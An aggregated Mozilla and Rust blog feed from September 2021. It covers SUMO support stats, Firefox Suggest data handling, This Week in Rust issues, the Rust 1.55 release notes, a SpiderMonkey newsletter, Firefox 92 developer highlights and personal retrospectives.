  • Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can address them during the meeting.

Community stats

KB

KB pageviews (*)

Month    | Page views | Vs previous month
Aug 2021 | 8,462,165  | +2.47%

* KB pageviews number is a total of KB pageviews for /en-US/ only

Top 5 KB contributors in the last 90 days: 

  1. AliceWyman
  2. Thomas8
  3. Michele Rodaro
  4. K_alex
  5. Pierre Mozinet

KB Localization

Top 10 locale based on total page views

Locale | Aug 2021 pageviews (*) | Localization progress (per Sep 7) (**)
de     | 8.57% | 99%
zh-CN  | 6.69% | 100%
pt-BR  | 6.62% | 63%
es     | 5.95% | 44%
fr     | 5.43% | 91%
ja     | 3.93% | 57%
ru     | 3.70% | 100%
pl     | 1.98% | 100%
it     | 1.81% | 86%
zh-TW  | 1.45% | 6%

* Locale pageviews is the overall number of pageviews from the given locale (KB and other pages)

** Localization progress is the percentage of localized articles out of all KB articles per locale

Top 5 localization contributors in the last 90 days: 

  1. Milupo
  2. Michele Rodaro
  3. Jim Spentzos
  4. Soucet
  5. Artist

Forum Support

Forum stats

Month    | Total questions | Answer rate within 72 hrs | Solved rate within 72 hrs | Forum helpfulness
Aug 2021 | 3523            | 75.59%                    | 17.40%                    | 66.67%

Top 5 forum contributors in the last 90 days: 

  1. FredMcD
  2. Cor-el
  3. Jscher2000
  4. Seburo
  5. Sfhowes

Social Support

Channel         | Total conv (Aug 2021) | Conv interacted (Aug 2021)
@firefox        | 2967                  | 341
@FirefoxSupport | 386                   | 270

Top contributors in Aug 2021

  1. Christophe Villeneuve
  2. Andrew Truong
  3. Pravin

Play Store Support

We don’t have enough data for the Play Store Support yet. However, you can check out the overall Respond Tool metrics here.

Product updates

Firefox desktop

Firefox mobile

Other products / Experiments

  • Mozilla VPN V2.5 Expected to release 09/15
  • Fx Search experiment:
    • From Sept 6, 2021 1% of the Desktop user base will be experimenting with Bing as the default search engine. The study will last into early 2022, likely wrapping up by the end of January.
    • Common response:
      • Forum: Search study – September 2021
      • Conversocial clipboard: “Mozilla – Search study sept 2021”
      • Twitter: Hi, we are currently running a study that may cause some users to notice that their default search engine has changed. To revert back to your search engine of choice, please follow the steps in the following article → https://mzl.la/3l5UCLr
  • Firefox Suggest + Data policy update (Sept 16 + Oct 5)
    • On September 16th, the Mozilla Privacy Policy will be updated to supplement the rollout of FX Suggest online mode. Currently, FX Suggest uses offline mode, which limits the data collected. Online mode will collect additional anonymized information after users opt in to this feature. Users can opt out of this experience by following the instructions here.

Shout-outs!

  • Kudos to Julie for her work on the Knowledge Base lately. She’s definitely adding a new color to our KB world with her video and article improvements.
  • Thanks to those who contributed to the FX Desktop Topics Discussion
    • If you have input or questions please post them to the thread above

If you know anyone who we should feature here, please contact Kiki and we’ll make sure to add them in our next edition.

Useful links:

Niko MatsakisCTCFT 2021-09-20 Agenda

The next “Cross Team Collaboration Fun Times” (CTCFT) meeting will take place next Monday, on 2021-09-20 (in your time zone)! This post covers the agenda. You’ll find the full details (along with a calendar event, zoom details, etc) on the CTCFT website.

Agenda

  • Announcements
  • Interest group panel discussion

We’re going to try something a bit different this time! The agenda is going to focus on Rust interest groups and domain working groups, those brave explorers who are trying to put Rust to use in all kinds of interesting domains. Rather than having fixed presentations, we’re going to have a panel discussion with representatives from a number of Rust interest groups and domain groups, led by AngelOnFira. The idea is to open a channel for more active communication and feedback between the interest groups and the Rust teams (in both directions).

Afterwards: Social hour

After the CTCFT this week, we are going to try an experimental social hour. The hour will be coordinated in the #ctcft stream of the rust-lang Zulip. The idea is to create breakout rooms where people can gather to talk, hack together, or just chill.

Data@MozillaData and Firefox Suggest

Introduction

Firefox Suggest is a new feature that displays direct links to content on the web based on what users type into the Firefox address bar. Some of the content that appears in these suggestions is provided by partners, and some of the content is sponsored.

In building Firefox Suggest, we have followed our long-standing Lean Data Practices and Data Privacy Principles. Practically, this means that we take care to limit what we collect, and to limit what we pass on to our partners. The behavior of the feature is straightforward: suggestions are shown as you type, and are directly relevant to what you type.

We take the security of the datasets needed to provide this feature very seriously. We pursue multi-layered security controls and practices, and strive to make as much of our work as possible publicly verifiable.

In this post, we wanted to give more detail about what data is needed to provide this feature, and about how we handle it.

Changes with Firefox Suggest

The address bar experience in Firefox has long been a blend of results provided by partners (such as the user’s default search provider) and information local to the client (such as recently visited pages). For the first time, Firefox Suggest augments these data sources with search completions from Mozilla.

Firefox Suggest data flow diagram

In its current form, Firefox Suggest compares searches against a list of allowed terms that is local to the client. When the search text matches a term on the allowed list, a completion suggestion may be shown alongside the local and default search engine suggestions.
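
A toy sketch of that client-side matching, with a made-up allowed list and illustrative URLs (the real implementation lives in Firefox's address bar code and is more involved):

# Hypothetical allowed list shipped to the client.
ALLOWED_TERMS = {
    "costa rica": "https://en.wikipedia.org/wiki/Costa_Rica",
    "vans": "https://www.ebay.com/",  # illustrative sponsored completion
}

def suggestion_for(typed):
    # The match happens locally against the shipped list.
    return ALLOWED_TERMS.get(typed.strip().lower())

print(suggestion_for("Costa Rica"))  # -> the Wikipedia URL above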

Data Collected by Mozilla

Mozilla collects the following information to power Firefox Suggest when users have opted in to contextual suggestions.

  • Search queries and suggest impressions: Firefox Suggest sends Mozilla search terms and information about engagement with Firefox Suggest, some of which may be shared with partners to provide and improve the suggested content.
  • Clicks on suggestions: When a user clicks on a suggestion, Mozilla receives notice that suggested links were clicked.
  • Location: Mozilla collects city-level location data along with searches, in order to properly serve location-sensitive queries.

How Data is Handled and Shared

Mozilla approaches handling this data conservatively. We take care to remove data from our systems as soon as it’s no longer needed. When passing data on to our partners, we are careful to only provide the partner with the minimum information required to serve the feature.

A specific example of this principle in action is the search’s location. The location of a search is derived from the Firefox client’s IP address. However, the IP address can identify a person far more precisely than is necessary for our purposes. We therefore convert the IP address to a more general location immediately after we receive it, and we remove the IP address from all datasets and reports downstream. Access to machines and (temporary, short-lived) datasets that might include the IP address is highly restricted, and limited only to a small number of administrators. We don’t enable or allow analysis on data that includes IP addresses.
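
In pseudocode terms, that handling might look like the following sketch; city_for_ip is a hypothetical stand-in for whatever GeoIP lookup the pipeline uses, and the event shape is invented for illustration:

def city_for_ip(ip):
    # Hypothetical GeoIP lookup (e.g. against a MaxMind-style database).
    return "Portland, OR"

def generalize_location(event):
    # Convert the IP to a coarse location immediately on receipt...
    ip = event.pop("ip_address")
    event["city"] = city_for_ip(ip)
    # ...so downstream datasets and reports never contain the IP itself.
    return event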

We’re excited to be bringing Firefox Suggest to you. See the product announcement to learn more!

This Week In RustThis Week in Rust 408

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is qcell, with a type that works like a compile-time RefCell.

Thanks to Soni L. for the suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

278 pull requests were merged in the last week

Rust Compiler Performance Triage

Fairly busy week, with some large improvements on several benchmarks. Several larger rollups landed, in part due to recovery from a temporary CI outage, and continued CI trouble since then. This is likely the cause for the somewhat unusual presence of rollups in our results.

Triage done by @simulacrum. Revision range: 69c4aa290..9f85cd6

2 Regressions, 2 Improvements, 4 Mixed; 2 of them in rollups

31 comparisons made in total

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs
New RFCs

No new RFCs were proposed this week.

Upcoming Events

Online

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Gouach

Indeed

Enso

SmartThings

DEMV Systems

Kollider

Polar Sync

SecureDNA

Kraken

Parity Technologies

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Edition!

Niko and Daphne Matsakis on YouTube

Thanks to mark-i-m for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

The Talospace ProjectFirefox 92 on POWER

Firefox 92 is out. Alongside some solid DOM and CSS improvements, the most interesting bug fix I noticed was a patch for open alerts slowing down other tabs in the same process. In the absence of a JIT we rely heavily on Firefox's multiprocessor capabilities to make the most of our multicore beasts, and this apparently benefits (among others, but in particular) the Google sites we unfortunately have to use in these less-free times. I should note for the record that on this dual-8 Talos II (64 hardware threads) I have dom.ipc.processCount modestly increased to 12 from the default of 8 to take a little more advantage of the system when idle, which also takes down fewer tabs in the rare cases when a content process bombs out. The delay in posting this was waiting for the firefox-appmenu patches, but I decided to just build it now and add those in later. The .mozconfigs and LTO-PGO patches are unchanged from Firefox 90/91.
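
(For reference, if you want to try the same tweak and you manage prefs through a user.js, the equivalent line is below; you can also just edit dom.ipc.processCount in about:config.)

user_pref("dom.ipc.processCount", 12); // default is 8; higher trades memory for parallelism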

Meanwhile, in OpenPOWER JIT progress, I'm about halfway through getting the Wasm tests to pass, though I'm currently hung up on a memory corruption bug while testing Wasm garbage collection. It's our bug; it doesn't happen with the C++ interpreter, but unfortunately like most GC bugs it requires hitting it "just right" to find the faulty code. When it all passes, we'll pull everything up to 91ESR for the MVP, and you can try building it. If you want this to happen faster, please pitch in and help.

Spidermonkey Development BlogSpiderMonkey Newsletter (Firefox 92-93)

SpiderMonkey is the JavaScript engine used in Mozilla Firefox. This newsletter gives an overview of the JavaScript and WebAssembly work we’ve done as part of the Firefox 92 and 93 Nightly release cycles.

👷🏽‍♀️ JS features

⚡ WebAssembly

  • We’ve done some work towards Memory64 support.
  • The final JS API for Wasm exceptions has been implemented.
  • We added support for WebAssembly.Function from the js-types proposal.
  • We changed unaligned floating point accesses on 32-bit ARM to not use signal handlers.
  • Wasm code is now much faster and uses less memory when the debugger is used.
  • memory.fill and memory.copy are now optimized with SIMD instructions.
  • We now print better error messages to the console for asm.js.

❇️ Stencil

Stencil is our project to create an explicit interface between the frontend (parser, bytecode emitter) and the rest of the VM, decoupling those components. This lets us improve web-browsing performance, simplify a lot of code and improve bytecode caching.

  • We’ve rewritten our implementation of self-hosted code (builtins implemented in JS) to be based on the stencil format instead of cloning from a special zone. This has resulted in significant memory and performance improvements.
  • We’re making changes to function delazification to later allow doing this off-thread.
  • We hardened XDR decoding more against memory/disk corruption.

🌍 Unified Intl implementation

Work is underway to unify the Intl (Internationalization) code in SpiderMonkey and the rest of Gecko as a shared mozilla::intl component. This results in less code duplication and will make it easier to migrate from the ICU library to ICU4X in the future.

Over the past weeks, Intl.Collator and Intl.RelativeTimeFormat have been ported to the new mozilla::intl code.

🗂 ReShape

ReShape is a project to optimize and simplify our object layout and property representation after removing TI. This will help us fix some long-standing issues related to performance, memory usage and code complexity.

  • We converted uses of object private slots to reserved slots and then removed private slots completely. This allowed us to optimize reserved slots.
  • We changed function objects to use reserved slots instead of a custom C++ layout.
  • We saved some memory by storing only the shape instead of an object for object literals.
  • We changed the shape teleporting optimization to avoid a performance cliff and to be simpler.
  • We changed global objects to use a C++ class instead of hundreds of reserved slots.
  • We optimized object allocation, especially for plain objects, array objects and functions because these are so common.

🧹 Garbage Collection

  • We now avoid marking and sweeping arenas for permanent atoms.
  • We simplified the GC threshold code. This resulted in a number of performance improvement alerts.
  • We simplified the GC allocation code for strings.
  • We made some changes to the way slice budgets are calculated to reduce jank caused by long GC pauses.
  • We fixed an issue with JIT code discarding heuristics that caused frequent OOMs in automation on 32-bit platforms.

📚 Miscellaneous

  • We tidied up our meta bugs in Bugzilla. We now have a tree of meta bugs.
  • We optimized Map and Set operations in the JITs.
  • We fixed a number of correctness issues with super, class return values, private methods and date parsing.
  • We now auto-generate more LIR boilerplate code.
  • A new contributor, sanketh, added an option to use fdlibm for more Math functions to get consistent results across platforms and to avoid fingerprinting.
  • We removed a lot of unnecessary includes.

Firefox NightlyThese Weeks in Firefox: Issue 99

Highlights

Friends of the Firefox team

Introductions/Shout-Outs

  • Huge welcome to new hires Katherine Patenio and Niklas Baumgardner
    • Katherine previously worked on Review Board through a student project
    • Niklas previously worked on Firefox’s Picture-in-Picture feature through a student project
    • Both will be working on driving the DTD -> Fluent migration to completion as their first project

Resolved bugs (excluding employees)

Fixed more than one bug

  • Antonin LOUBIERE
  • Ava Katushka
  • Kajal Sah

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
  • Bug 1717760 (initKeyEvent on KeyboardEvent should return undefined) has regressed the ability of some extensions to auto-fill input fields in Firefox 93; this has impacted password manager extensions in recent Nightly builds:
    • Bitwarden has fixed the issue on the extension side – Bug 1724925
    • 1password classic is also impacted – Bug 1725232
    • We may be putting off unshipping KeyboardEvent.initKeyEvent for extension content scripts as a short-term fix on the Firefox side – Bug 1727024. Thanks to Masayuki and :smaug for looking into that.
  • Fixed a couple of issues with custom prefs set for the xpcshell tests (Bug 1723198, Bug 1723536); this is not an issue specific to the extensions tests, but we identified it while investigating a backout due to an unexpected Android-only failure (Bug 1722966 comment 12).
WebExtension APIs
  • Fixed an issue with restoring private tabs discarded earlier during their creation (not specifically an addon issue, but it could be mainly triggered by addons using the browser.tabs.discard API) – Bug 1727024

Fission

  • Nightly users now are at 63% with Fission enabled
  • Beta users now are at 33% with Fission enabled

Form Autofill

Lint, Docs and Workflow

Nimbus / Experiments

Password Manager

Performance

Proton/MR1

  • All of the blockers for putting most of the strings (minus menubar strings) in sentence case for en-US appear to be fixed! We’re checking around to see if there are any leftovers that we somehow missed. If you find any, please mark them as blocking this bug.

Search and Navigation

  • Daisuke fixed a regression where jar: urls were not visited from the Address Bar – Bug 1726305
  • Daisuke fixed a visual bug in the separate Search Bar where search engine buttons were sometimes cut – Bug 1722507
  • Gijs made the Address Bar “not secure” chiclet visible with most locales and added a tooltip – Bug 1724212
  • Harry fixed a regression where some results were not shown if history results were disabled in Address Bar settings – Bug 1725652
  • Mark switched the Search Service tests to use IOUtils – Bug 1726565

Screenshots

The Rust Programming Language BlogAnnouncing Rust 1.55.0

The Rust team is happy to announce a new version of Rust, 1.55.0. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, getting Rust 1.55.0 is as easy as:

rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.55.0 on GitHub.

What's in 1.55.0 stable

Cargo deduplicates compiler errors

In past releases, when running cargo test, cargo check --all-targets, or similar commands that built the same Rust crate in multiple configurations, errors and warnings could show up duplicated, as the parallel rustc invocations each emitted the same diagnostics.

For example, in 1.54.0, output like this was common:

$ cargo +1.54.0 check --all-targets
    Checking foo v0.1.0
warning: function is never used: `foo`
 --> src/lib.rs:9:4
  |
9 | fn foo() {}
  |    ^^^
  |
  = note: `#[warn(dead_code)]` on by default

warning: 1 warning emitted

warning: function is never used: `foo`
 --> src/lib.rs:9:4
  |
9 | fn foo() {}
  |    ^^^
  |
  = note: `#[warn(dead_code)]` on by default

warning: 1 warning emitted

    Finished dev [unoptimized + debuginfo] target(s) in 0.10s

In 1.55, this behavior has been adjusted to deduplicate and print a report at the end of compilation:

$ cargo +1.55.0 check --all-targets
    Checking foo v0.1.0
warning: function is never used: `foo`
 --> src/lib.rs:9:4
  |
9 | fn foo() {}
  |    ^^^
  |
  = note: `#[warn(dead_code)]` on by default

warning: `foo` (lib) generated 1 warning
warning: `foo` (lib test) generated 1 warning (1 duplicate)
    Finished dev [unoptimized + debuginfo] target(s) in 0.84s

Faster, more correct float parsing

The standard library's implementation of float parsing has been updated to use the Eisel-Lemire algorithm, which brings both speed improvements and improved correctness. In the past, certain edge cases failed to parse, and this has now been fixed.

You can read more details on the new implementation in the pull request description.

std::io::ErrorKind variants updated

std::io::ErrorKind is a #[non_exhaustive] enum that classifies errors into portable categories, such as NotFound or WouldBlock. Rust code that has a std::io::Error can call the kind method to obtain a std::io::ErrorKind and match on that to handle a specific error.

Not all errors are categorized into ErrorKind values; some are left uncategorized and placed in a catch-all variant. In previous versions of Rust, uncategorized errors used ErrorKind::Other; however, user-created std::io::Error values also commonly used ErrorKind::Other. In 1.55, uncategorized errors now use the internal variant ErrorKind::Uncategorized, which we intend to leave hidden and never available for stable Rust code to name explicitly; this leaves ErrorKind::Other exclusively for constructing std::io::Error values that don't come from the standard library. This enforces the #[non_exhaustive] nature of ErrorKind.

Rust code should never match ErrorKind::Other and expect any particular underlying error code; only match ErrorKind::Other if you're catching a constructed std::io::Error that uses that error kind. Rust code matching on std::io::Error should always use _ for any error kinds it doesn't know about, in which case it can match the underlying error code, or report the error, or bubble it up to calling code.

We're making this change to smooth the way for introducing new ErrorKind variants in the future; those new variants will start out nightly-only, and only become stable later. This change ensures that code matching variants it doesn't know about must use a catch-all _ pattern, which will work both with ErrorKind::Uncategorized and with future nightly-only variants.

Open range patterns added

Rust 1.55 stabilized using open ranges in patterns:

match x as u32 {
    0 => println!("zero!"),
    1.. => println!("positive number!"),
}

Read more details here.

Stabilized APIs

The following methods and trait implementations were stabilized.

The following previously stable functions are now const.

Other changes

There are other changes in the Rust 1.55.0 release: check out what changed in Rust, Cargo, and Clippy.

Contributors to 1.55.0

Many people came together to create Rust 1.55.0. We couldn't have done it without all of you. Thanks!

Dedication

Anna Harren was a member of the community and contributor to Rust known for coining the term "Turbofish" to describe ::<> syntax. Anna recently passed away after living with cancer. Her contribution will forever be remembered and be part of the language, and we dedicate this release to her memory.

Hacks.Mozilla.OrgTime for a review of Firefox 92

Release time comes around so quickly! This month we have quite a few CSS updates, along with the new Object.hasOwn() static method for JavaScript.

This blog post provides merely a set of highlights; for all the details, check out the following:

CSS Updates

A couple of CSS features have moved from behind a preference and are now available by default: accent-color and size-adjust.

accent-color

The accent-color CSS property sets the color of an element’s accent. Accents appear in elements such as a checkbox or radio input. Its default value is auto, which represents a UA-chosen color that should match the accent color of the platform. You can also specify a color value. Read more about the accent-color property here.

size-adjust

The size-adjust descriptor for @font-face takes a percentage value which acts as a multiplier for glyph outlines and metrics. Another tool in the CSS box for controlling fonts, it can help to harmonize the designs of various fonts when rendered at the same font size. Check out some examples on the size-adjust descriptor page on MDN.

And more…

Along with both of those, the break-inside property now has support for the values avoid-page and avoid-column, the font-size-adjust property accepts two values, and, if that wasn’t enough, system-ui is now supported as a generic font family name for the font-family property.

break-inside property on MDN

font-size-adjust property on MDN

font-family property on MDN

Object.hasOwn arrives

A nice addition to JavaScript is the Object.hasOwn() static method. This returns true if the specified property is a direct property of the object (even if that property’s value is null or undefined). false is returned if the specified property is inherited or not declared. Unlike the in operator, this method does not check for the specified property in the object’s prototype chain.

Object.hasOwn() is recommended over Object.hasOwnProperty() as it works for objects created using Object.create(null) and with objects that have overridden the inherited hasOwnProperty() method.
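
To see the difference in action, here is a quick sketch (the dict object name is hypothetical):

// A null-prototype object has no inherited hasOwnProperty() to call.
const dict = Object.create(null);
dict.answer = 42;

console.log(Object.hasOwn(dict, "answer"));    // true
console.log(Object.hasOwn(dict, "toString"));  // false: not an own property

// Unlike the `in` operator, Object.hasOwn() ignores the prototype chain.
console.log("toString" in { a: 1 });               // true (inherited)
console.log(Object.hasOwn({ a: 1 }, "toString"));  // false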

Read more about Object.hasOwn() on MDN

The post Time for a review of Firefox 92 appeared first on Mozilla Hacks - the Web developer blog.

Will Kahn-GreeneMozilla: 10 years

It's been a long while since I wrote Mozilla: 1 year review. I hit my 10-year "Moziversary" as an employee on September 6th. I was hired in a "doubling" period of Mozilla, so there are a fair number of people who are hitting 10 year anniversaries right now. It's interesting to see that even though we're all at the same company, we had different journeys here.

I started out as a Software Engineer or something like that. Then I was promoted to Senior Software Engineer and then Staff Software Engineer. Then last week, I was promoted to Senior Staff Software Engineer. My role at work over time has changed significantly. It was a weird path to get to where I am now, but that's probably a topic for another post.

I've worked on dozens of projects in a variety of capacities. Here's a handful of the ones that were interesting experiences in one way or another:

  • SUMO (support.mozilla.org): Mozilla's support site

  • Input: Mozilla's feedback site, user sentiment analysis, and Mozilla's initial experiments with Heartbeat and experiments platforms

  • MDN Web Docs: documentation, tutorials, and such for web standards

  • Mozilla Location Service: Mozilla's device location query system

  • Buildhub and Buildhub2: index for build information

  • Socorro: Mozilla's crash ingestion pipeline for collecting, processing, and analyzing crash reports for Mozilla products

  • Tecken: Mozilla's symbols server for uploading and downloading symbols and also symbolicating stacks

  • Standup: system for reporting and viewing status

  • FirefoxOS: Mozilla's mobile operating system

I also worked on a bunch of libraries and tools:

  • siggen: library for generating crash signatures using the same algorithm that Socorro uses (Python)

  • Everett: configuration library (Python)

  • Markus: metrics client library (Python)

  • Bleach: sanitizer for user-provided text for use in an HTML context (Python)

  • ElasticUtils: Elasticsearch query DSL library (Python)

  • mozilla-django-oidc: OIDC authentication for Django (Python)

  • Puente: convenience library for using gettext strings in Django (Python)

  • crashstats-tools: command line tools for accessing Socorro APIs (Python)

  • rob-bugson: Firefox addon that adds Bugzilla links to GitHub PR pages (JS)

  • paul-mclendahand: tool for combining GitHub PRs into a single branch (Python)

  • Dennis: gettext translated strings linter (Python)

I was a part of things:

I've given a few presentations [1]:

  [1] I thought there were more, but I can't recall what they might have been.

I've left lots of FIXME notes everywhere.

I made some stickers:

/images/soloist_2017_handdrawn.thumbnail.png

"Soloists" sticker (2017)

/images/ted_sticker.thumbnail.png

"Ted maintained this" sticker (2019)

I've worked with a lot of people and created some really warm, wonderful friendships. Some have left Mozilla, but we keep in touch.

I've been to many work weeks, conferences, summits, and all hands trips.

I've gone through a few profile pictures:

/images/profile_2011.thumbnail.jpg

Me in 2011

/images/profile_2013.thumbnail.jpg

Me in 2013

/images/profile_2016.thumbnail.jpg

Me in 2016 (taken by Erik Rose in London)

/images/profile_2021.thumbnail.jpg

Me in 2021

I've built a few desks, though my pictures are pretty meagre:

/images/standing_desk_rough_sketch.thumbnail.jpg

Rough sketch of a standing desk

/images/standing_desk_1.thumbnail.jpg

Standing desk and a stool I built

/images/desk_2021.thumbnail.jpg

My current chaos of a desk

I've written lots of blog posts on status, project retrospectives, releases, initiatives, and such. Some of them are fun reads still.

It's been a long 10 years. I wonder if I'll be here for 10 more. It's possible!

This Week In RustThis Week in Rust 407

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

Sadly, we had no nominations this week. Still, in the spirit of not leaving you without some neat Rust code, I give you gradient, a command line tool to extract gradients from SVG, and to display and manipulate them.

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

300 pull requests were merged in the last week

Rust Compiler Performance Triage

A busy week, with lots of mixed changes, though in the end only a few were deemed significant enough to report here.

Triage done by @pnkfelix. Revision range: fe379..69c4a

3 Regressions, 1 Improvement, 3 Mixed; 0 of them in rollups. 57 comparisons made in total.

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New RFCs

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Formlogic

OCR Labs

ChainSafe

Subspace

dcSpark

Kraken

Kollider

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

In Rust, soundness is never just a convention.

@H2CO3 on rust-users

Thanks to Riccardo D'Ambrosio for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Niko MatsakisRustacean Principles

As the web site says, Rust is a language empowering everyone to build reliable and efficient software. I think it’s precisely this feeling of empowerment that people love about Rust. As wycats put it recently to me, Rust makes it “feel like things are possible that otherwise feel out of reach”. But what exactly makes Rust feel that way? If we can describe it, then we can use that description to help us improve Rust, and to guide us as we design extensions to Rust.

Besides the language itself, Rust is also an open-source community, one that prides itself on our ability to do collaborative design. But what do we do which makes us able to work well together? If we can describe that, then we can use those descriptions to help ourselves improve, and to instruct new people on how to better work within the community.

This blog post describes a project I and others have been working on called the Rustacean principles. This project is an attempt to enumerate the (heretofore implicit) principles that govern both Rust’s design and the way our community operates. The principles are still in draft form; for the time being, they live in the nikomatsakis/rustacean-principles repository.

How the principles got started

The Rustacean Principles were suggested by Shane during a discussion about how we can grow the Rust organization while keeping it true to itself. Shane pointed out that, at AWS, mechanisms like tenets and the leadership principles are used to communicate and preserve shared values.[1] The goal at AWS, as in the Rust org, is to have teams that operate independently but which still wind up “itching in the same direction”, as aturon so memorably put it.

Since that initial conversation, the principles have undergone quite some iteration. The initial effort, which I presented at the CTCFT on 2021-06-21, was quite closely modeled on AWS tenets. After a number of in-depth conversations with both joshtriplett and aturon, though, I wound up evolving the structure quite a bit to what you see today. I expect them to continue evolving, particularly the section on what it means to be a team member, which has received less attention.

Rust empowers by being…

The principles are broken into two main sections. The first describes Rust’s particular way of empowering people. This description comes in the form of a list of properties that we are shooting for:

These properties are frequently in tension with one another. Our challenge as designers is to find ways to satisfy all of these properties at once. In some cases, though, we may be forced to decide between slightly penalizing one goal or another. In that case, we tend to give the edge to those goals that come earlier in the list over those that come later. Still, while the ordering is important, it’s worth emphasizing that for Rust to be successful we need to achieve all of these feelings at once.

Each of the properties has a page that describes it in more detail. The page also describes some specific mechanisms that we use to achieve this property. These mechanisms take the form of more concrete rules that we apply to Rust’s design. For example, the page for reliability discusses type safety, consider all cases, and several other mechanisms. The discussion gives concrete examples of the tradeoffs at play and some of the techniques we have used to mitigate them.

One thing: these principles are meant to describe more than just the language. For example, the great error messages are one way that Rust is supportive, and Cargo’s lock files and dependency system are geared towards making Rust feel reliable.

How to Rustacean

Rust has been an open source project since its inception, and over time we have evolved and refined the way that we operate. One key concept for Rust is the governance teams, whose members are responsible for decisions regarding Rust’s design and maintenance. We definitely have a notion of what it means “to Rustacean” – there are specific behaviors that we are looking for. But it has historically been really challenging to define them, and in turn to help people to achieve them (or to recognize when we ourselves are falling short!). The next section of the site, How to Rustacean, is a first attempt at drafting just such a list. You can think of it like a companion to the Code of Conduct: whereas the CoC describes the bare minimum expected of any Rust participant, the How to Rustacean section describes what it means to excel.

This section of the site has undergone less iteration than the “Rust empowerment” section. The idea is that each of these principles has a dedicated page that elaborates on the principle and gives examples of it in action. The example of Raising an objection about a design (from Show up) is the most developed and a good one to look at to get the idea. One interesting bit is the “goldilocks” structure,[2] which indicates what it means to “show up” too little but also what it means to “show up” too much.

How the principles can be used

For the principles to be a success, they need to be more than words on a website. I would like to see them become something that we actively reference all the time as we go about our work in the Rust org.

As an example, we were recently wrestling with a minor point about the semantics of closures in Rust 2021. The details aren’t that important (you can read them here, if you like), but the decision ultimately came down to a question of whether to adapt the rules so that they are smarter, but more complex. I think it would have been quite useful to refer to these principles in that discussion: ultimately, I think we chose to (slightly) favor productivity at the expense of transparency, which aligns well with the ordering on the site. Further, as I noted in my conclusion, I would personally like to see some form of explicit capture clause for closures, which would give users a way to ensure total transparency in those cases where it is most important.

The How to Rustacean section can be used in a number of ways. One thing would be cheering on examples of where someone is doing a great job: Mara’s issue celebrating all the contributions to the 2021 Edition is a great instance of paying it forward, for example, and I would love it if we had a precise vocabulary for calling that out.

Another time these principles can be used is when looking for new candidates for team membership. When considering a candidate, we can look to see whether we can give concrete examples of times they have exhibited these qualities. We can also use the principles to give feedback to people about where they need to improve. I’d like to be able to tell people who are interested in joining a Rust team, “Well, I’ve noticed you do a great job of showing up, but your designs tend to get mired in complexity. I think you should work on ‘start somewhere’.”

“Hard conversations” where you tell someone what they can do better are something that managers do (or try to do…) in companies, but which often get sidestepped or avoided in an open source context. I don’t claim to be an expert, but I’ve found that having structure can help to take away the “sting” and make it easier for people to hear and learn from the feedback.[3]

What comes next

I think at this point the principles have evolved enough that it makes sense to get more widespread feedback. I’m interested in hearing from people who are active in the Rust community about whether they reflect what you love about Rust (and, if not, what might be changed). I also plan to try and use them to guide both design discussions and questions of team membership, and I encourage others in the Rust teams to do the same. If we find that they are useful, then I’d like to see them turned into an RFC and ultimately living on forge or somewhere more central.

Questions?

I’ve opened an internals thread for discussion.

Footnotes

  1. One of the first things that our team did at Amazon was to draft its own tenets; the discussion helped us to clarify what we were setting out to do and how we planned to do it. 

  2. Hat tip to Marc Brooker, who suggested the “Goldilocks” structure, based on how the Leadership Principles are presented in the AWS wiki. 

  3. Speaking of which, one glance at my queue of assigned PRs makes it clear that I need to work on my follow through.

Chris H-CThis Week in Glean: Data Reviews are Important, Glean Parser makes them Easy

